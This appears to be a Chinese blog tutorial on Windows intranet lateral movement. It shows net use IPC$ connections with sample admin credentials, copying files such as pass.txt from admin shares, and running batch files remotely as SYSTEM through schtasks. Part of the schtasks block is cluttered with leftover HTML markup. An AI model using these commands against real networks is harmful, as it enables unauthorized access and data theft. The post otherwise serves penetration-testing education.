linux幼儿园

  • 首页
  • 信息安全
    • 红队
    • 密码学
  • 软件
  • 硬件
  • 活动目录
  • 知识点
  • linux干货
  • linux命令集
    • 磁盘管理
    • 文档编辑
    • 设备管理
    • 网络通讯
    • 系统管理
    • 文件管理
    • 其他命令
  1. 首页
  2. 信息安全
  3. 正文

内网渗透之命令行渗透

2020年11月10日 281点热度 0人点赞 0条评论
内网渗透
在内网渗透的时候,如果想要登录远程桌面,会容易暴露自己,所以尽可能学会使用命令行操作会在渗透实际过程中有很大的帮助。命令行渗透

IPC$

建立ipc连接以后,就可以访问目标机器的文件(上传、下载),也可以在目标机器 上运行命令。上传和下载文件直接通过 copy 命令就可以,不过路径换成 UNC 路径。何为 UNC 路径?简单来讲以 \\ 开头的路径就是 UNC 路径,比如 \\192.168.1.2\c$\

域用户可以连接域里面的所有机子,但是如果域用户不是这个域机子的成员,那么就没有权限访问该域机子的文件。

建立连接

C
1
命令:net use \\192.168.3.21 /u:god\administrator Admin12345

查看目标开放的共享

C
1
net view \\192.168.3.21

只有域控才会有下面两个共享目录:

C
1
NETLOGON      Disk          Logon server shareSYSVOL        Disk          Logon server share

删除连接

C
1
net use \\192.168.3.21 /del /y

dir 命令

C
1
# 查看C盘下的文件dir \\192.168.3.21\c$

copy 命令

C
1
# 把当前机器C盘下的1.txt文件拷贝到目标桌面copy 1.txt \\192.168.3.21\c$\users\administrator\desktop\

C
1
# 吧目标机器上的pass.txt拷贝到本地coyp \\192.168.3.21\c$\users\administrator\desktop\pass.txt

type 命令

C
1
# 查看目标桌面1.txt文件内容type \\192.168.3.21\c$\users\administrator\desktop\1.txt

把目标的C盘映射到本地

C
1
# 把目标C盘映射到本地的x盘,x盘可以随便取名net use x: \\192.168.3.21\c$

这个时候当前机器磁盘就会多了一个x盘,就是映射目标主机的c盘:

我们可以随意查看文件:


计划任务执行命令

schtasks(计划任务)语法

C
1
[crayon-6037c4d02a3fe155372928 inline="true" ]<span class="code-snippet_outer"><span class="code-snippet__comment"># 一、执行bat</span></span>
<span class="code-snippet_outer">schtasks /<span class="code-snippet__keyword">create</span> /tn task1 /U 域\域用户 /P 域用户密码 /tr 执行的命令或者bat路径 /sc ONSTART /s 域机器IP /RU <span class="code-snippet__keyword">system</span></span> <span class="code-snippet_outer"><span class="code-snippet__comment"># 二、运行</span></span> <span class="code-snippet_outer">schtasks /run /tn task1 /s 域机子IP /U 域\域用户 /P 域用户密码</span> <span class="code-snippet_outer"><span class="code-snippet__comment"># 三、删除计划任务</span></span> <span class="code-snippet_outer">schtasks /F /<span class="code-snippet__keyword">delete</span> /tn task1 /s 域机子IP /U 域\域用户 /P 域用户密码</span> <span class="code-snippet_outer">/RU <span class="code-snippet__keyword">system</span>  :立即执行,以<span class="code-snippet__keyword">system</span>权限执行</span> <span class="code-snippet_outer"><span class="code-snippet__comment"># 域用户</span></span> <span class="code-snippet_outer">schtasks /<span class="code-snippet__keyword">create</span> /tn task1 /U <span class="code-snippet__keyword">domain</span>\username /P <span class="code-snippet__keyword">password</span> /tr C:\temp\<span class="code-snippet__number">1.</span>bat /sc /ONSTART /s <span class="code-snippet__number">192.168</span><span class="code-snippet__number">.1</span><span class="code-snippet__number">.1</span> /RU <span class="code-snippet__keyword">system</span></span> <span class="code-snippet_outer">schtasks /run /tn task1 /s <span class="code-snippet__number">192.168</span><span class="code-snippet__number">.1</span><span class="code-snippet__number">.1</span> /U <span class="code-snippet__keyword">domain</span>\username /P <span class="code-snippet__keyword">password</span></span> <span class="code-snippet_outer">schtasks /F /<span class="code-snippet__keyword">delete</span> /tn task1 /s <span class="code-snippet__number">192.168</span><span class="code-snippet__number">.1</span><span class="code-snippet__number">.1</span> /U <span class="code-snippet__keyword">domain</span>\username /P <span class="code-snippet__keyword">password</span></span> <span class="code-snippet_outer"><span class="code-snippet__comment"># 本地用户</span></span> <span class="code-snippet_outer">schtasks /<span class="code-snippet__keyword">create</span> /tn task1 /U a\username /P <span class="code-snippet__keyword">password</span> /tr C:\temp\<span class="code-snippet__number">1.</span>bat /sc ONSTART /s <span class="code-snippet__number">192.168</span><span class="code-snippet__number">.1</span><span class="code-snippet__number">.1</span> /RU <span class="code-snippet__keyword">system</span></span> <span class="code-snippet_outer">schtasks /run /tn task1 /s <span class="code-snippet__number">192.168</span><span class="code-snippet__number">.1</span><span class="code-snippet__number">.1</span> /U a\username /P <span class="code-snippet__keyword">password</span></span> <span class="code-snippet_outer">schtasks /F /<span class="code-snippet__keyword">delete</span> /tn task1 /s <span class="code-snippet__number">192.168</span><span class="code-snippet__number">.1</span><span class="code-snippet__number">.1</span> /U a\username /P <span class="code-snippet__keyword">password</span></span>[/crayon]

schtasks(计划任务)实例

我先在本地创建一个bat文件:执行命令输出到目标临时目录1.txt里

C
1
whoami &gt;&gt; c:\windows\temp\1.txtnet user &gt;&gt; c:\windows\temp\1.txtsysteminfo &gt;&gt; c:\windows\temp\1.txt

然后把1.bat拷贝到目标桌面:

C
1
copy 1.bat \\192.168.3.21\c$\users\administrator\desktop

然后创建计划任务并执行:

C
1
# 创建计划任务名为task1schtasks /create /tn task1 /U god\administrator /P Admin12345 /tr C:\users\administrator\desktop\1.bat /sc ONSTART /s 192.168.3.21 /RU system# 执行计划任务task1schtasks /run /tn task1 /s 192.168.3.21 /U god\administrator /P Admin12345# 删除计划任务task1schtasks /F /delete /tn task1 /s 192.168.3.21 /U god\administrator /P Admin12345

这个时候我们就可以通过查看目标机器的 c:\windows\temp\1.txt ,就可以查看到刚刚我们想要执行的命令:

C
1
type \\192.168.3.21\c$\windows\temp\1.txt


参考文章:

https://www.jianshu.com/p/226d65f5084a

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
标签: 命令行渗透
最后更新:2020年11月10日

jcghaier

from zero to hero

打赏 点赞
< 上一篇
下一篇 >

文章评论

取消回复
最新 热点 随机
最新 热点 随机
windows入侵检查流程 安全事件应急响应工具箱 利用腾讯轻量服务器搭建FRP服务 Windows局域网渗透(IPC$管道) 国内三大运营商宽带线路及分级介绍(联通篇) Windows Server 2012 R2 辅助域控制器搭建
安全事件应急响应工具箱windows入侵检查流程
htpasswd命令 - 管理用户基本认证文件 chronyc命令 - 设置时间与时钟服务器同步 setsebool命令 - 修改布尔值 ldconfig命令 - 动态链接库管理命令 国内三大运营商宽带线路及分级介绍(联通篇) login命令 - 登入系统
标签聚合
防火墙 深信服 X.509 zabbix iptables tcp Debian CentOS 勒索病毒 nmap
书签
  • Linux就该这么学
  • pfschina.org
  • ruyo
  • 佐须之男
  • 大象笔记
  • 小陈博客
  • 我能过软考
  • 教父爱分享
  • 散尽浮华
  • 现代魔法学院

COPYRIGHT © 2020 linux幼儿园. ALL RIGHTS RESERVED.

THEME KRATOS MADE BY VTROIS

51la